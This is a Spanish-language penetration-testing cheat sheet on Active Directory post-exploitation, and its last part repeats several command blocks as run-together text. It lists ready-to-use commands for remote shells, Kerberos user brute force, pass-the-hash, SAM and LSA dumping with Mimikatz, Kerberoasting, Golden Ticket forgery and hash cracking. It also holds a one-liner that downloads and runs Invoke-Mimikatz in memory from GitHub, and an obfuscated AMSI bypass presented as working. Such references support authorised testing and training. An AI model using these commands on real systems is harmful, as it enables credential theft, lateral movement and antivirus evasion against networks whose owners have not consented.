Ataques Post-Explotación

Acceso con Shell

evil-winrm -i <target> -u <username> -p <password>
impacket-psexec dominio.local/<USER>@<IP>
impacket-wmiexec dominio.local/<USER>@<IP>

Enumeración de usuarios mediante fuerza bruta a Kerberos

kerbrute -domain <DOMAIN>.LOCAL -users <USER_LIST> -dc-ip <IP>

Pass the Hash

#Comprobar credenciales válidas
crackmapexec smb <IP/CIDR> -u <USER> -H <HASH> --local-auth

#Inicio de sesión PTH
evil-winrm -i <DOMAIN>.local -u <USER> -H "<HASH>"
impacket-psexec <USER>:@<IP> -hashes <LMHASH>:<NTHASH>

Extracción de hashes de la SAM

impacket-secretsdump <DOMINIO>.LOCAL/<USER>@<IP>

Cracking de hashes NTLM

hashcat -m 1000 hashes.txt rockyou.txt

Extracción de datos del dominio

#Con bloodhound-python
bloodhound-python -u <USER> -p <PASSWORD> -d <DOMINIO>.LOCAL -ns <IP> -c All

#Con SharpHound (desde PowerShell)
#Desactivar Execution Policy
powershell -ep bypass
#Cargar el script
. .\SharpHound.ps1
#Ejecutar la función
Invoke-BloodHound -CollectionMethod All -Domain <DOMINIO>.LOCAL -ZipFileName file.zip

Kerberoasting

#Extracción de hashes
impacket-GetUserSPNs <DOMAIN>.local/<USER> -dc-ip <IP> -request

#Cracking de hashes TGS-REP
hashcat -m 13100 hashes.txt rockyou.txt

Mimikatz

#Básico
privilege::debug
sekurlsa::logonpasswords
lsadump::sam /patch
lsadump::lsa /patch

#Golden Ticket attack
lsa /inject /name:krbtgt
kerberos::golden /User:<FAKE_USER/ADMIN> /DOMAIN:<domain.tld> /sid:<SID> /krbtgt:<NTLM_KRBTGT_HASH> /id:500 /ptt
misc::cmd
dir \\<MACHINE_NAME>\c$

#Cargar Mimikatz desde un recurso externo sin tocar disco
iex (new-object net.webclient).downloadstring('https://raw.githubusercontent.com/EmpireProject/Empire/7a39a55f127b1aeb951b3d9d80c6dc64500cacb5/data/module_source/credentials/Invoke-Mimikatz.ps1')
#One-liners
invoke-mimikatz -command '"privilege::debug" "token::elevate" "sekurlsa::logonpasswords"'
invoke-mimikatz -command '"privilege::debug" "token::elevate" "lsadump::sam"'

Evasión de antivirus

AMSI Bypass (Funcionando 12/2022)

#Desactivar Execution Policy
powershell -ep bypass
#Comando Bypass
S`eT-It`em ( 'V'+'aR' +  'IA' + ('blE:1'+'q2')  + ('uZ'+'x')  ) ( [TYpE](  "{1}{0}"-F'F','rE'  ) )  ;    (    Get-varI`A`BLE  ( ('1Q'+'2U')  +'zX'  )  -VaL  )."A`ss`Embly"."GET`TY`Pe"((  "{6}{3}{1}{4}{2}{0}{5}" -f('Uti'+'l'),'A',('Am'+'si'),('.Man'+'age'+'men'+'t.'),('u'+'to'+'mation.'),'s',('Syst'+'em')  ) )."g`etf`iElD"(  ( "{0}{2}{1}" -f('a'+'msi'),'d',('I'+'nitF'+'aile')  ),(  "{2}{4}{0}{1}{3}" -f ('S'+'tat'),'i',('Non'+'Publ'+'i'),'c','c,'  ))."sE`T`VaLUE"(  ${n`ULl},${t`RuE} )
#Forzando protocolos para evitar errores
$TLS12Protocol = [System.Net.SecurityProtocolType] 'Ssl3 , Tls12'
[System.Net.ServicePointManager]::SecurityProtocol = $TLS12Protocol

Otros ataques

Group Policy Preferences (GPP Attack)

Zerologon

PrintNightmare

AnteriorEnumeración Post-Explotación SiguientePlataformas de aprendizaje

Última actualización hace 1 año

#Comprobar credenciales válidas crackmapexec smb <IP/CIDR> -u <USER> -H <HASH> --local-auth #Inicio de sesión PTH evil-winrm -i <DOMAIN>.local -u <USER> -H "<HASH>" impacket-psexec <USER>:@<IP> -hashes <LMHASH>:<NTHASH>

#Con bloodhound-python bloodhound-python -u <USER> -p <PASSWORD> -d <DOMINIO>.LOCAL -ns <IP> -c All #Con SharpHound (desde PowerShell) #Desactivar Execution Policy powershell -ep bypass #Cargar el script . .\SharpHound.ps1 #Ejecutar la función Invoke-BloodHound -CollectionMethod All -Domain <DOMINIO>.LOCAL -ZipFileName file.zip

#Básico privilege::debug sekurlsa::logonpasswords lsadump::sam /patch lsadump::lsa /patch #Golden Ticket attack lsa /inject /name:krbtgt kerberos::golden /User:<FAKE_USER/ADMIN> /DOMAIN:<domain.tld> /sid:<SID> /krbtgt:<NTLM_KRBTGT_HASH> /id:500 /ptt misc::cmd dir \\<MACHINE_NAME>\c$ #Cargar Mimikatz desde un recurso externo sin tocar disco iex (new-object net.webclient).downloadstring('https://raw.githubusercontent.com/EmpireProject/Empire/7a39a55f127b1aeb951b3d9d80c6dc64500cacb5/data/module_source/credentials/Invoke-Mimikatz.ps1') #One-liners invoke-mimikatz -command '"privilege::debug" "token::elevate" "sekurlsa::logonpasswords"' invoke-mimikatz -command '"privilege::debug" "token::elevate" "lsadump::sam"'

#Desactivar Execution Policy powershell -ep bypass #Comando Bypass S`eT-It`em ( 'V'+'aR' + 'IA' + ('blE:1'+'q2') + ('uZ'+'x') ) ( [TYpE]( "{1}{0}"-F'F','rE' ) ) ; ( Get-varI`A`BLE ( ('1Q'+'2U') +'zX' ) -VaL )."A`ss`Embly"."GET`TY`Pe"(( "{6}{3}{1}{4}{2}{0}{5}" -f('Uti'+'l'),'A',('Am'+'si'),('.Man'+'age'+'men'+'t.'),('u'+'to'+'mation.'),'s',('Syst'+'em') ) )."g`etf`iElD"( ( "{0}{2}{1}" -f('a'+'msi'),'d',('I'+'nitF'+'aile') ),( "{2}{4}{0}{1}{3}" -f ('S'+'tat'),'i',('Non'+'Publ'+'i'),'c','c,' ))."sE`T`VaLUE"( ${n`ULl},${t`RuE} ) #Forzando protocolos para evitar errores $TLS12Protocol = [System.Net.SecurityProtocolType] 'Ssl3 , Tls12' [System.Net.ServicePointManager]::SecurityProtocol = $TLS12Protocol